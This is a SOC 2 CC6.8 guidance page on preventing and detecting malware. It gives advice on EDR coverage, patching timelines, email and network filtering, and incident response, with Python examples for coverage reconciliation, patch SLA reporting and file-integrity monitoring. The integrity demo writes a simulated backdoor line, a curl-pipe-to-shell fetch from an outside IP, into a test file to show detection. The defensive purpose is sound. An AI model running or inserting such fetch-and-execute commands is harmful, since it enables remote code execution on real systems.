AuditFront

SOC 2 CC6.8: Logical and Physical Access - Prevention and Detection of Unauthorized Software

What This Control Requires

The entity implements controls to prevent or detect and act on the introduction of unauthorized or malicious software to meet the entity's objectives. The entity uses detection and prevention measures to identify and respond to malware, ransomware, and other unauthorized software installations.

In Plain Language

Malware remains one of the most common and damaging attack vectors. A single ransomware infection can take down operations for days, and a well-placed trojan can exfiltrate data for months before detection. CC6.8 is about having both the prevention and detection layers to stop this from happening.

In practice, you need anti-malware or EDR on all endpoints and servers, application control policies limiting what can be installed and run, a patch management programme that closes known vulnerabilities quickly, and monitoring across the environment for signs of malicious activity.

Auditors test this by looking at deployment coverage (are all endpoints actually protected?), update status (are signatures and agents current?), patching compliance, and incident response history. Gaps in any of these areas are common findings.

How to Implement

Deploy endpoint detection and response (EDR) or anti-malware on every endpoint - workstations, laptops, and servers. Make sure the solution provides real-time protection, behavioural analysis, and automated response. Configure automatic signature and agent updates, and use the management console to track deployment coverage and alert status. Do not trust the console's own coverage figure on its own: a host that was never enrolled does not appear in it at all, and an agent that has silently stopped checking in still looks "installed". Reconcile the console's agent list against your asset inventory and flag both cases.
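The reconciliation described above, as an added example (not AuditFront code): it compares an asset inventory with an EDR console export and reports hosts with no agent, agents that have gone quiet, agents with stale definitions, and agents on hosts nobody inventoried. Both data sets are constructed stand-ins for a CMDB export and a vendor console export, and the thresholds (7 days silent, 3 days for signatures) are assumptions to tune to your own policy.

```python
"""EDR coverage reconciliation: asset inventory vs. agent console export.

Added example for this page; it is not AuditFront's code. Both data sets
are constructed stand-ins for a CMDB/cloud inventory and an EDR console
export, and the thresholds (7 days silent, 3 days for signatures) are
assumptions you would tune to your own policy.
"""
from dataclasses import dataclass
from datetime import date, datetime, timedelta

# Constructed asset inventory: every host that is supposed to run an agent.
INVENTORY = {
    "web-01": "server",
    "web-02": "server",
    "db-01": "server",
    "lt-alice": "laptop",
    "lt-bob": "laptop",
    "ws-finance-3": "workstation",
}

# Constructed EDR console export: host -> (last check-in, agent version, signature date).
EDR_EXPORT = {
    "web-01": ("2024-06-10T08:00:00", "7.2.1", "2024-06-10"),
    "web-02": ("2024-05-20T08:00:00", "7.1.0", "2024-05-20"),    # silent for three weeks
    "lt-alice": ("2024-06-10T07:30:00", "7.2.1", "2024-06-01"),  # checks in, but definitions are old
    "lt-bob": ("2024-06-09T22:00:00", "7.2.1", "2024-06-09"),
    "old-printer": ("2024-06-10T08:00:00", "7.2.1", "2024-06-10"),  # agent on a host nobody inventoried
}


@dataclass
class CoverageReport:
    missing: list         # inventoried, but no agent record at all
    stale: list           # agent exists but has not checked in within stale_days
    old_signatures: list  # agent checks in but its definitions are older than sig_days
    unknown: list         # agent reports a host that is missing from the inventory
    coverage_pct: float   # share of inventoried hosts with a live, checking-in agent


def coverage_report(inventory, edr, now, stale_days=7, sig_days=3):
    now_dt = datetime.fromisoformat(now)
    missing, stale, old_sigs = [], [], []
    for host in sorted(inventory):
        rec = edr.get(host)
        if rec is None:
            missing.append(host)
            continue
        last_seen, _version, sig_date = rec
        if now_dt - datetime.fromisoformat(last_seen) > timedelta(days=stale_days):
            stale.append(host)
        if now_dt.date() - date.fromisoformat(sig_date) > timedelta(days=sig_days):
            old_sigs.append(host)
    unknown = sorted(set(edr) - set(inventory))
    # A host only counts as covered if an agent exists and is still talking to the console.
    covered = len(inventory) - len(missing) - len(stale)
    pct = round(100.0 * covered / len(inventory), 1)
    return CoverageReport(missing, stale, old_sigs, unknown, pct)


if __name__ == "__main__":
    r = coverage_report(INVENTORY, EDR_EXPORT, "2024-06-10T09:00:00")
    print(f"coverage: {r.coverage_pct}%")
    for label in ("missing", "stale", "old_signatures", "unknown"):
        print(f"{label}: {getattr(r, label)}")
```

Run this on a schedule and keep the output: the four lists are exactly the evidence an auditor asks for under "deployment coverage", and the `unknown` list usually surfaces shadow IT that the inventory process itself has missed.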

Restrict software installation. Remove local admin rights from standard users so they can't install software without IT approval. Maintain an approved software catalogue and set up a request process for new applications. For high-security environments, consider application whitelisting (allowlisting), for example Windows AppLocker or Windows Defender Application Control, so that only approved binaries and scripts can execute at all.

Set up a patch management programme with clear timelines based on severity: critical patches within 14 days, high within 30, medium within 60, low within 90. Treat vulnerabilities that are being actively exploited as an exception with a shorter timeline, whatever their nominal severity score. Track compliance across all systems, measured from the date each vulnerability was detected, and report on patch status regularly.
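A compliance report against those timelines, as an added example (not AuditFront code). It takes a scanner-style list of findings with detection and remediation dates, classifies each as met, missed, open or overdue against the page's four tiers, and produces the per-severity counts and breach list an auditor would expect to see. The findings are constructed sample data.

```python
"""Patch SLA compliance report: which findings breached the severity timelines.

Added example for this page; not AuditFront's code. The findings list is
constructed sample data standing in for a vulnerability-scanner export; the
SLA tiers are the ones quoted on the page.
"""
from collections import Counter, defaultdict
from datetime import date

# Days allowed from detection to remediation, by severity.
SLA_DAYS = {"critical": 14, "high": 30, "medium": 60, "low": 90}

# Constructed scanner export: (finding id, host, severity, detected, remediated or None).
FINDINGS = [
    ("F-101", "web-01", "critical", "2024-05-01", "2024-05-10"),  # closed in 9 days
    ("F-102", "web-02", "critical", "2024-05-01", "2024-05-20"),  # closed in 19 days
    ("F-103", "db-01", "high", "2024-04-01", None),               # still open after 70 days
    ("F-104", "lt-alice", "medium", "2024-05-15", None),          # open, 26 days in
    ("F-105", "web-01", "low", "2024-05-01", "2024-06-01"),       # closed in 31 days
]


def classify(finding, today):
    """Return (status, days) where status is one of met / missed / open / overdue."""
    _fid, _host, severity, detected, remediated = finding
    allowed = SLA_DAYS[severity]
    start = date.fromisoformat(detected)
    if remediated is None:
        days = (date.fromisoformat(today) - start).days
        return ("overdue" if days > allowed else "open"), days
    days = (date.fromisoformat(remediated) - start).days
    return ("missed" if days > allowed else "met"), days


def sla_report(findings, today):
    """Per-severity status counts plus the findings currently in breach of their SLA."""
    by_severity = defaultdict(Counter)
    breaches = []
    for f in findings:
        status, days = classify(f, today)
        by_severity[f[2]][status] += 1
        if status in ("missed", "overdue"):
            breaches.append((f[0], f[1], f[2], status, days))
    compliant = len(findings) - len(breaches)
    return {
        "by_severity": {sev: dict(c) for sev, c in by_severity.items()},
        "breaches": breaches,
        "compliance_pct": round(100.0 * compliant / len(findings), 1),
    }


if __name__ == "__main__":
    report = sla_report(FINDINGS, "2024-06-10")
    print(f"overall within SLA: {report['compliance_pct']}%")
    for sev in SLA_DAYS:
        print(sev, report["by_severity"].get(sev, {}))
    for fid, host, sev, status, days in report["breaches"]:
        print(f"BREACH {fid} {host} {sev} {status} after {days} days (SLA {SLA_DAYS[sev]})")
```

Note that the clock starts at detection, not at ticket creation, and that a closed finding can still be a breach (`missed`): auditors look at both the current backlog and how past findings were handled.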

Secure the most common malware delivery vector: email. Deploy filtering with anti-malware scanning, URL rewriting with time-of-click checks, attachment sandboxing, and anti-phishing protections (including SPF, DKIM and DMARC enforcement on inbound mail). Quarantine or block anything suspicious.

Add network-based malware detection at boundary points: IDS/IPS with malware signatures, DNS filtering to block known malicious domains, and network traffic analysis to catch command-and-control communications.

Document your malware incident response procedures. Define how alerts are triaged, investigated, contained, and remediated. Make sure you can isolate infected systems quickly, preserve forensic evidence, and perform root cause analysis. Run tabletop exercises of malware scenarios regularly.

Evidence Your Auditor Will Request

  • EDR/anti-malware deployment records showing coverage across all endpoints and servers
  • Anti-malware solution configuration including automatic update status and scan schedules
  • Application control policy and evidence of enforcement (restricted admin rights, approved software list)
  • Patch management records showing compliance with defined patching timelines
  • Malware incident response procedures and records of recent incidents and responses

Common Mistakes

  • Anti-malware solution is not deployed on all endpoints, leaving coverage gaps on servers or specialized systems
  • Malware definitions are not updated automatically, leaving systems vulnerable to recent threats
  • Users have local administrator rights, enabling installation of unauthorized or malicious software
  • Patch management is inconsistent, with critical vulnerabilities remaining unpatched beyond defined timelines
  • Malware alerts are generated but not reviewed or investigated in a timely manner

Related Controls Across Frameworks

Framework        Control ID   Relationship
ISO 27001:2022   A.8.7        Equivalent (Protection against malware)
ISO 27001:2022   A.8.8        Related (Management of technical vulnerabilities)
ISO 27001:2022   A.8.19       Partial overlap (Installation of software on operational systems)
NIST CSF 2.0     DE.CM-01     Related

Frequently Asked Questions

Should we use traditional antivirus or EDR?
Go with EDR if you can. It gives you behavioural analysis, threat hunting, automated response, and forensic telemetry that traditional antivirus does not. Much current malware is packed, polymorphic, or fileless (living in scripting engines and legitimate system tools), so a static signature alone catches it late or not at all. If budget is tight, a next-generation antivirus with behavioural analysis is the minimum you should deploy.
How do we protect Linux servers that cannot run traditional antivirus?
Several EDR and anti-malware solutions now support Linux. Deploy Linux-compatible security agents for malware detection, file integrity monitoring, and behavioural analysis. Layer on network-based detection, strict access controls, application whitelisting, and regular vulnerability scanning. Make sure Linux servers are part of your patch management programme too - they often get overlooked.
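The file integrity monitoring mentioned above, as an added example (not AuditFront code, and not a substitute for a maintained FIM tool such as AIDE or the FIM module of a Linux EDR agent): it hashes a directory tree into a baseline, then reports files that were added, removed, or changed in content or permission bits. The tree and the simulated tampering in `demo()` are constructed inside a temporary directory so the example runs offline.

```python
"""Minimal file-integrity baseline and comparison for a Linux host.

Added example for this page; not AuditFront's code, and not a replacement
for a maintained FIM tool (AIDE, or the FIM module of a Linux EDR agent).
The directory tree and the tampering in demo() are constructed inside a
temporary directory so the example runs offline.
"""
import hashlib
import os
import tempfile


def build_baseline(root):
    """Map each file under root (relative, '/'-separated) to its SHA-256 and mode bits."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            baseline[rel] = {
                "sha256": h.hexdigest(),
                "mode": os.stat(path).st_mode & 0o7777,  # also catches setuid / world-writable changes
            }
    return baseline


def compare(old, new):
    """Diff two baselines: new files, vanished files, and files whose hash or mode changed."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Build a baseline, simulate a compromise, and return what the comparison reports."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed files standing in for a few things worth watching on a server.
        files = {
            "usr/local/bin/healthcheck": b"#!/bin/sh\ncurl -fsS http://localhost/health\n",
            "etc/cron.d/backup": b"0 2 * * * root /usr/local/bin/backup\n",
            "etc/ssh/sshd_config": b"PermitRootLogin no\nPasswordAuthentication no\n",
        }
        for rel, body in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(body)
        baseline = build_baseline(root)

        # Constructed tampering: a script is backdoored, a cron job deleted, a binary dropped.
        with open(os.path.join(root, "usr", "local", "bin", "healthcheck"), "ab") as f:
            f.write(b"curl -s http://203.0.113.5/x | sh\n")
        os.remove(os.path.join(root, "etc", "cron.d", "backup"))
        with open(os.path.join(root, "usr", "local", "bin", ".cache-helper"), "wb") as f:
            f.write(b"\x7fELF...")

        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Two practical points the code does not show: the baseline has to live off the host (or be signed) so an intruder with root cannot rewrite it alongside the files, and the comparison should run on a schedule with its output forwarded to your SIEM, since a diff nobody reads is the "alerts not reviewed" finding from the list above.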
Should we block all USB devices?
Blocking all USB storage devices is the cleanest approach and removes a common malware delivery vector entirely. If USB devices are genuinely needed for business, implement a whitelist of approved encrypted devices, scan on insertion, and log all usage. The more you can restrict here, the less risk you carry.
